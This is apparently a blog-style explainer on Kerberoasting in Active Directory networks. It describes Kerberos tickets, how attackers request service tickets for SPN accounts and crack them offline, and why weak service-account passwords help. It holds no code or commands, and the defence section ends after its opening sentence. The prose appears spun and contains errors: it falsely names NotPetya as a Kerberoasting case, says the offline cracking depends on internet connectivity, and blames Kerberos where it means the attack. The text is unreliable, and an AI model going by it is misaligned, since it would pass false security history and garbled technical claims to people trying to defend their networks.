Hackers in today's digital world are constantly creating innovative ways to access systems and steal data, especially in more interconnected business networks. A particularly effective method they use is referred to as "Kerberoasting." The success of this attack path in using flaws in the Kerberos authentication system directly leads to the serious privilege escalation assaults it may cause in corporate settings. Companies, security practitioners, and IT experts who want to guard their systems from this increasing threat must be informed about Kerberoasting.

The Basics of Kerberos Authentication

Kerberos is a widely used network authentication protocol that relies on secret-key cryptography to verify the identity of users and systems within a network. It was developed in the 1980s by MIT to authenticate users securely across unprotected networks, including the Internet. Windows Active Directory (AD), which Microsoft ultimately made Kerberos the default for, is the popular authentication technique used in business networks nowadays. Kerberos generates a Ticket Granting Ticket (TGT) once a user has successfully authenticated. Service requests using this TGT provide access to email systems, file servers, and databases, among other network resources. Only authorized users may access the resources these service tickets contain, including the Service Principal Name (SPN), by encrypting them with the password hash of the service account.

The Rise of Kerberoasting

One kind of attack using Kerberos's service ticket issuance system is kerberoasting. Accounts with SPNs are the ones it targets since they are linked to highly privileged service accounts, including those handling email servers, database services, or enterprise-level apps. Weak or poorly kept passwords make these service accounts easy targets for hackers. Starting from the domain controller, an attacker asks for a service ticket for a target account using a quite low-privileged user. Since the password is encrypted with the hash of the target account, the assailant can try brute force or crack the password offline using multiple techniques once he gets the service ticket. Once the security of the target service account is compromised, the assailant could access other significant systems on the network and maybe unlock more permissions.

How Kerberoasting Works

Kerberos causes major concern for businesses as it makes it easy for attackers to expand rights. Regular usage of it is part of larger all-encompassing attack campaigns like Advanced Persistent Threat (APT) operations. Once an adversary has increased their access, they can install malware, steal sensitive data, or even control the full network of a company. The 2017 NotPetya assault, costing billions of dollars and aiming businesses all across the world, is one well-known instance of Kerberoasting in action. The attackers spread malware over corporate networks via Kerberoasting and other methods, therefore compromising significant infrastructure and interfering with business processes.

During a penetration test for a major financial institution, Kerberoasting enabled a security company to access critical banking apps operating on service accounts in another context. The effective results of this assault are shown by the testers' successful entry of significant financial systems via weak passwords.

Why Kerberoasting Is Effective

In particular, kerberoasting is effective because a direct connection with the target system is not required once the service ticket is obtained. As the assault depends on internet connectivity, the assailant might operate at their own speed to breach passwords without attracting notice from intrusion detection systems. Moreover, the attack uses architectural flaws in the Kerberos system, making discovery or counteraction challenging in the absence of comprehensive security monitoring and management. Furthermore, poor password management for service accounts contributes to Kerberoasting's success. When it comes to updating passwords, service accounts are usually neglected, and they usually have weak and readily cracked passwords. Companies with several service accounts, each accessing various systems, may find it difficult to enforce consistently strong password restrictions, therefore increasing the likelihood of security breakdowns.

Defending Against Kerberoasting

Given the severity of Kerberoasting attacks, organizations must implement effective countermeasures to protect their networks. Here are some best practices that can help mitigate the risk.